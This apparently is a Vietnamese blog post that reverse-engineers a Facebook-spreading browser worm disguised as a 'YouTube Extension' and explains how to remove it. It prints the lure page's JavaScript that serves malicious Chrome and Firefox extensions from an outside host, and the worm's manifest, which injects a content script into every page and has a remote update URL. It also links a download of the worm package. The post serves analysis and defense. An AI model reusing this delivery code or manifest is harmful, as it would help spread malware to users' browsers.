Mình bị con Worm này làm phiền quá, bạn bè bị dính cứ vô spam đầy cái wall của mình. Thôi thì làm một cú RE nhanh con Worm này và chỉ bà con cách gỡ bỏ con worm này khỏi trình duyệt



Con worm này xuất phát từ một trang fake FB ở địa chỉ http://fbviralvideos.blogspot.com/

Tại trang này chả có gì cả ngoài việc nó làm giả y chang một cái trang FB của một em hót girl nào đó bên trời tây, kèm một cái link "Cài đặt plugin" để coi em ấy show hàng. Khi click vào cái nút "Install Plugin" đó nó sẽ kích hoạt một hàm tên


Cái hàm này sẽ thực hiện thăm dò xem trình duyệt nạn nhân đang dùng là Firefox hay Chrome để đưa ra cái link cài Plugin giả mạo

<script>
var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar(){
if (is_chrome){
window.open("http://yourvidsviral.com/youtube.crx");
} else if(is_firefox){
var params = {
"Youtube Extension": {
URL: "http://yourvidsviral.com/youtube.xpi",
toString: function () { return this.URL; }
}
};
InstallTrigger.install(params);
} else{
window.open("");
}
}
</script>

Cái link cài plugin xạo xạo này chính là con Worm. Cái hay ở đây là con Worm này không làm bằng binary mà viết bằng javascript và được đóng gói thành plugin của Chrome ( dạng crx ) và plugin của Firefox ( dạng xpi ).

Sau khi cài plugin vào thì nó sẽ kích hoạt phần chính của con Worm, đây là phần chịu trách nhiệm lây lan tiếp tới các người dùng FB khác. Script này được load về từ link http://yourvidsviral.com/script.js

Kèm theo đó, trong con worm này còn được tích hợp cơ chế cập nhật thông qua tính năng cập nhật plugin tự động của Firefox hay Chrome

{
"content_scripts": [ {
"all_frames": true,
"matches": [ "http://*/*"],
"js": [ "go.js" ]
} ],

"description": "Plays Youtube Videos Online, Quickly \u0026 Efficiently",
"icons": {
"128": "icon128.png",
"16": "icon16.png",
"48": "icon48.png"
},

"name": "YouTube Extension",
"permissions": [ "*://*/*" ],
"update_url": "http://allinfree.net/chrome.xml", "version": "1.0.3"
}

Đã RE xong, bạn có thể tải về toàn bộ gói dữ liệu của con worm đã được RE tại đây để nghiên cứu
http://www.mediafire.com/?6vxm6a77t4x66t1

-----------------------------
Cách gỡ bỏ con Worm
Chrome: mở tab mới, vào phần Apps, kiếm cái plugin Youtube, nhấp phải chọn remove from Chrome . Xong
Firefox: vào Menu Tool -> add-on -> extensions -> chọn cái plugin Youtube rồi chọn Remove . Xong

Post a Comment

+ Hiện tại HungCoder.Com đang cập nhật giao diện cho trang blog này. Nên sẽ có một số lỗi xãy ra khi các bạn xem blog này.